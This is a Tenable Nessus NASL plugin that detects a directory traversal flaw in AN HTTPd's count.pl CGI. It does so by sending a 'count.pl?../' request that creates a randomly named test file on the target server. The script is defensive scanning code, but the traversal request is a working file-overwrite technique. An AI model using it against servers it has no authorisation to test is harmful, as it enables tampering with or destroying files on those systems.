AN HTTPd count.pl Traversal Arbitrary File Overwrite

2003-04-27T00:00:00
ID AN_HTTPD_COUNT_CGI.NASL
Type nessus
Reporter This script is Copyright (C) 2003-2020 Tenable Network Security, Inc.
Modified 2003-04-27T00:00:00

Description

The remote web server is running a CGI called

                                        
                                            #TRUSTED 7601c32151182125333adf73aeb87dbf35633957000d7113b2d6a4eb597f1f861db27fef082ae38220a2a6340eec09fb9b76d9f996a9d66e224eff1925c394bf8c50c274f37ddb76f3b32830e31c1a5796f6907d984bd7eb9649a50283f4464fbe88e43a2112d1f70b2858da9b8a9f36e3036ca79daa15c691109a10774c0c14662b94b3e75a6b61e88b3dc809a85fe4da636eda139359e97c01b43fbbcf652599448ca6164a4d4962fa6505e630ee2a52ad6eb97fd769b90b37d7c8f9bef8c22bc77c2e2417c930d0b1faf0cf69a3f559fa1fb652e2b89293cf54c9d4c3d9e1fc40b4e89c7f0a0b2683f627214c5875403086c47f0b7773067350361b7b16d0f3e2ce43e38d837bb1d144de05ad98e1c14ad39cca59ced66e2c0a5eca1e7824361b2722745e6bef9cad7a4b82d8443dd7fd3c91be12aa30d20234cc0790a0a7c79e8f4a29a7e0db0f216889249271031f1fdda0b7737132218dba62432bdb7dfb0c2065a66b5e8a9a27a92413ffcb40c6e79062e553d8d0974dfd11b09423f2948ec605d5403eda37562780b3576050a7c375898787b0be85635fd12a3b9eca959b006209e989c9ebd900e069d60305cdbce72b32facd4d4a295df0064d71e339aa9e28f9515ffe3a98d734e8af8bed0460da55ae0a49b7c3455bf4f102503e46cd6e8d1a4da0de4209fa460f995d1307418053e77fa729b62cf021a7b0a99e
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(11555);
 script_version("1.22");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/18");
 script_bugtraq_id(7397);
 script_name(english:"AN HTTPd count.pl Traversal Arbitrary File Overwrite");
 script_summary(english:"Creates a file on the remote server");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a directory traversal
vulnerability.");
 script_set_attribute(attribute:"description", value:
"The remote web server is running a CGI called 'count.pl' which is
affected by an directory traversal vulnerability. An attacker could
exploit this in order to overwrite any existing file on the remote
server, with the privileges of the httpd server.");
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/319354/30/0/threaded");
 script_set_attribute(attribute:"solution", value:"There is no known solution at this time.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P");
 script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
 script_set_attribute(attribute:"cvss_score_source", value:"manual");
 script_set_attribute(attribute:"cvss_score_rationale", value:"This vulnerability could be used to overwrite any existing file on the remote server.");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value:"2003/04/27");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_end_attributes();

 script_category(ACT_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2003-2020 Tenable Network Security, Inc.");

 script_family(english:"CGI abuses");

 script_dependencies("find_service1.nasl", "http_version.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/www", 80);
 exit(0);
}

include('audit.inc');
include('global_settings.inc');
include('misc_func.inc');
include('http.inc');
include('spad_log_func.inc');
include('global_settings_nlib.inc');
include('audit.inc');

if (report_paranoia < 2)
  audit(AUDIT_PARANOID);

##
#
# Try to write a file using the vulnerable count.pl script
# 
# @param dirs   - a list of CGI directories use with count.pl
# @return NULL
#
##
function write_file(dirs)
{
  local_var dir, r, req, new_out, res;

  foreach dir (dirs)
  {
    # follow_redirect parameter only used to distinguish between subsequent calls in flatline
    r = http_send_recv3(method:'GET', item:dir + "/" + file, port:port, follow_redirect:1);
    req = http_last_sent_request();
    requests[max_index(requests)] = req;
    spad_log(message: req);
    new_out = 'Response: '+r[0]+' '+r[1]+' '+r[2]+'\n\n';
    output += new_out;
    spad_log(message:new_out);
    res = r[2];

    if (isnull(r)) exit(0, 'No response received from the remote host');
    if('1' >< res) exit(0, 'Test file already exists on the remote host'); # Exists already ?!

    r = http_send_recv3(method:'GET', item:dir + "/count.pl?../" + file, port:port);
    req = http_last_sent_request();
    requests[max_index(requests)] = req;
    spad_log(message:req);
    new_out = 'Response: '+r[0]+' '+r[1]+' '+r[2]+'\n\n';
    output += new_out;
    spad_log(message:new_out);

    r = http_send_recv3(method:'GET', item:dir + "/" + file, port:port, follow_redirect:2);
    req = http_last_sent_request();
    requests[max_index(requests)] = req;
    spad_log(message:req);
    new_out = 'Response: '+r[0]+' '+r[1]+' '+r[2]+'\n\n';
    output += new_out;
    spad_log(message:new_out);
    res = r[2];
    if ('1' >< res)
    {
      vuln = TRUE;
      break;
    }
  }
}

port = get_http_port(default:80);

file = 'nessus-' + rand_str(length:8, charset:'0123456789ABCDEF') + '-' + rand_str(length:8, charset:'0123456789ABCDEF');

requests = make_list();
vuln = FALSE;
output = 'Received responses:\n\n';

if (thorough_tests && !get_kb_item('Settings/disable_cgi_scanning'))
{
  dirs = cgi_dirs();
  dirs[max_index(dirs)] = '/isapi';
}
else
  dirs = make_list('/isapi');

write_file(dirs:dirs);

if (!vuln)
  audit(AUDIT_HOST_NOT, 'affected');

security_report_v4(port:port, generic:TRUE, output:output, request:requests, severity:SECURITY_WARNING);